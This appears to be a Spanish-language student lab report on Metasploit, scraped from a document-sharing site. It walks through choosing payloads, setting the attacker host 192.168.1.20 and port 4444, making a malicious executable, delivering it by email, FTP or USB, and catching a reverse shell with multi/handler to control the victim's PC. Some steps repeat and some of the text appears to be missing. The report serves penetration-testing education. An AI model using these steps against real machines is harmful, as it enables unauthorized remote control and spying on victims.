Академический Документы
Профессиональный Документы
Культура Документы
3 Metasploit
Integrantes:
Jonathan Miguel Aguirre Parra
Elias Bermudez Márquez
Proceso de la actividad
Se inicia el Metasploit Framework con el siguiente comando: msfconsole
Teniendo el objetivo, falta indicar que tipo de ataque vamos a realizar. Con el
siguiente comando podemos visualizar todos los PAYLOADs disponibles para
realizar un posible ataque a la víctima: show PAYLOADS
PAYLOAD MÁS COMUNES
Nota: En este caso se tiene asignado los parámetros por defecto, cuya configuración se
tiene de la siguiente forma, nombre de usuario como “Metasploit” y contraseña
como “Metasploit$1”
Cambiando parámetros
Realizando ataque “exploit”
Comprobando en la PC de la víctima
Usar un exploit y mostrar las opciones disponibles (el mismo del paso anterior)
Aplicar la IP de la víctima
Nota: Al ver las configuraciones disponibles, vemos que ya está configurada sólo
establecer la IP de la víctima (en nuestro caso es 192.168.1.10) y el puerto (usaremos
el puerto 4444 que está disponible).
Nota: Las opciones del “PAYLOAD” que me permite generar el downloadEXEC (archivo
malicioso), pide la dirección IP del atacante y el puerto en que se va a vigilar (o en
escucha de la red).
Para pasar el archivo maliciosos, puede usar de diversos medios como por correo, vía
FTP, vía LAN (red interna de la empresa), por USB, etc. Una vez que el cliente lo tenga,
solo tener mucha paciencia para esperar en enlace con el cliente
Usar un exploit y mostrar las opciones disponibles (el mismo del paso anterior)
Nota: El exploit asignado es un (exploit/multi/handler) para recibir cualquier
vulnerabilidad configurado previamente (en este caso el EXE generado)
Se genera una sesión activa, para entrar o tomar control del equipo entramos, tomamos
el id de la sesión
4. win32_exec: Ejecutará un comando especificado por ti en la variable CMD.
Para el caso del LHOST se asigna la IP del atacante con el siguiente comando
set LHOST (set 192.168.1.20)
Por ultimo colocamos el comando exploit para lanzar el ataque con las variables
anteriormente utilizadas:
Este PAYLOAD nos permite obtener una sesión en modo administrador del
símbolo del sistema en el equipo víctima.
Para el caso del LHOST se asigna la IP del atacante con el siguiente comando
set LHOST (set 192.168.1.20)
Por ultimo colocamos el comando exploit para lanzar el ataque con las variables
anteriormente utilizadas:
Nos informa que fue correctamente ejecutado el exploit y nos abre una nueva
ventana donde podemos observar el escritorio de nuestra víctima y todo lo que
esta realiza dentro de la maquina.